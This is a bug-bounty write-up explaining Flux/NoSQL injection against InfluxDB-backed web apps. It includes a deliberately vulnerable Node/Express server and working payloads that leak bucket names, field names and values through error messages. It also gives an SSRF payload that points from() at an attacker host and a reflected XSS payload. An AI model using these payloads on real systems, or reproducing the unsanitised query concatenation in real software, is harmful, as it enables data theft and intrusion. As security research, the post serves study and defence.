InfluxDB NoSQL Injection

How do I developed an NoSQL Injection exploit for InfluxDB

InfluxDB NoSQL Injection

In this post, I'll share my experience of discovering a NoSQL Injection vulnerability in a Bug Bounty program in a non-popular database within the hacking community.

During the initial discovery, I was expecting to find a good blog post or tool teaching how to exploit NoSQL Injection on InfluxDB, but this was not the case, so I needed to understand how this database works to develop payload techniques to leak data from it.

Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.

What is InfluxDB

InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.

Initial Vulnerability Discovery

During the WEB application analysis, I received the following error after sending the character " in a query parameter of the URL:

error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF

This looked like a lot a injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.

At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) trying to figure out what is happening in the backend.

InfluxDB NoSQL Queries

This is a simple example of an InfluxDB NoSQL query:

from(bucket: "example-bucket")
    |> range(start: -1h)
    |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")

The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.

Here's a breakdown of each part of the query:

  1. from(bucket: "example-bucket"): This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." Buckets are like database names in SQL languages.

  2. |> range(start: -1h): This part sets the time range for the data retrieval. The range function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameter start: -1h means the data will be fetched from one hour ago until the current time.

  3. |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag"): This part applies a filter to the data based on certain conditions. The filter function is used to select specific data points that meet the defined criteria. The filter() performs operations similar to the SELECT statement and the WHERE clause in SQL-like languages.

In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."

Building a Vulnerable WEB Application

After knowing the syntax, it's time to build our vulnerable application to finally build a working proof of concept on real-world applications.

The following code is a vulnerable server example:

const express = require('express');
const {InfluxDB, Point} = require('@influxdata/influxdb-client')

const app = express();

const token = 'REDACTED' // InfluxDB Token
const url = 'https://127.0.0.1' // Local Database endpoint
const org = 'myOrg'
const bucket = 'publicBucket'

const client = new InfluxDB({url, token})

async function query(fluxQuery) {
  results = []

  queryApi = client.getQueryApi(org)

  for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
    o = tableMeta.toObject(values)
    console.log(o)
    results.push(o)
  }

  return results
}

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

const port = 3000;

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});

In the above example, the server is concatenating a user-supplied input at ' + req.query.data + ' to the InfluxDB query without any sanitization:

const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)

And by sending an HTTP request containing the character " that will escape the string sequence of the query, we can confirm that it returns the same error previously seen in the Bug Bounty program server:

Building The Payload

Leaking Bucket Names

As said earlier, on InfluxDB, bucket names are like database names on other SQL languages, and like an SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.

After carefully reading the documentation, and supposing that the injection occurs at the filter function, I achieved the following Error-based NoSQLI payload:

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//
  1. The buckets() function lists all the buckets from the current database.

  2. The filter() function uses the r.name expression to filter for bucket names, which the r is the result of the buckets query, and name is a field returned in the buckets() function.

  3. As you can see, the InfluxDB queries support regex with the =~ operation, so the logic behind the condition r.name =~ /^a.*/ is that it will be true if a bucket name starts with the letter a.

  4. After that, the filter uses a and condition that calls the die() function with the value of the bucket name as a parameter. The die() function throws an error with a custom message passed in the first parameter, which will leak the bucket name.

  5. The payload is also using the yield() function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.

  6. Finally, it's necessary to separate the yield() from the buckets query with a new line, and at the end of the payload, I added the // expression after another new line to comment everything after our injection.

Resuming, if a bucket name that starts with the letter a exists in the database, it will trigger the die() function that will leak the bucket name in the error message. If no bucket starts with the sent letter, the server will return an empty output with no errors.

Trying on our vulnerable application we can see that no errors returned with the letter a:

But sending the same payload with the letter p leaks the bucket name privateBucket:

To leak all bucket names it's necessary to test all characters, adding another sequence after matching (for example pa, pb, pc ...).

Leaking The Bucket Field Names

Now that we have the names of the buckets we can try to fetch their contents, but like other SQL languages, sometimes we need to specify the column names to query specific data, and in this section, I will show a technique to leak these column names in InfluxDB.

During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:

") |> yield(name: "1337") 
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r)) 
 //

The above payload uses a similar technique, using the yield() function and adding a comment at the end of the payload:

  1. The payload now uses the from() function to fetch the data of the leaked bucket name, the range() which is necessary, and finally the filter().

  2. In the filter() function, I called die() again, but now sending the entire result abject as a parameter. Since the die() function only accepts strings as parameters and the result object contains all the bucket data structure, the server will trigger a verbose error leaking it.

As you can see in the above screenshot, the server leaked this structure:

_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string

Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
 //

As we can see, the vulnerable app leaked the field name sensitive_field because it matched the regex condition r._field =~ /s.*/.

Leaking Field Values

After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB, it's where the data is stored, in other words, leaking the values is the last step of the exploitation. To do that we can use the same technique used to leak the field names, but now specifying the field that we want to retrieve:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
 //

By sending the above payload, the server responded with an error:

HttpError: runtime error @2:54-2:124: filter: type conflict: string != int

This occurs because the data stored on r._value is an integer and the die() function only accepts strings. To circumvent that, we can use the string() function to convert the integer value to a string, successfully leaking it in the error message:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
 //

As we can see in the above screenshot, the value of the sensitive_field is 1337. This means that we were able to fetch arbitrary data from other buckets!

InfluxDB Server-Side Request Forgery

While reading the documentation I noticed that some InfluxDB functions accept a host parameter, one of these functions is from():

By sending the host parameter in the from() function we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:

") |> yield(name: "1337")
 from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
 //

And this is the request received by my Burp Collaborator:

If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.

This is not a vulnerability from InfluxDB, this is just a feature being abused by a NoSQL Injection that was raised from an insecure coding practice.

InfluxDB Cross-Site Scripting

Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

If you have an XSS radar like me, you notice that when an error occurs in the InfluxDB query, the try{ } catch{ } statement sends the error back to the client with the Content-Type equals to text/html, allowing the browser load HTML and JavaScript.

Furthermore, we can control some data that is reflected in these errors, especially via the die() function:

Since the query API uses the GET method, it's possible to execute arbitrary JavaScript on the victim's browsers by sending a malicious link:

") die(msg:"<img src=x onerror=alert(document.domain)>")//

This is not an InfluxDB vulnerability because the issue raises from a NoSQL Injection caused by an insecure coding practice and an insecure default Content-Type by NodeJS.

Conclusion

In this blog post, I described my exploit development process of a NoSQL Injection vulnerability in a non-popular database within the hacking community and how I leveraged this issue to achieve an SSRF and XSS.

Did you find this article valuable?

Support Rafael da Costa Santos by becoming a sponsor. Any amount is appreciated!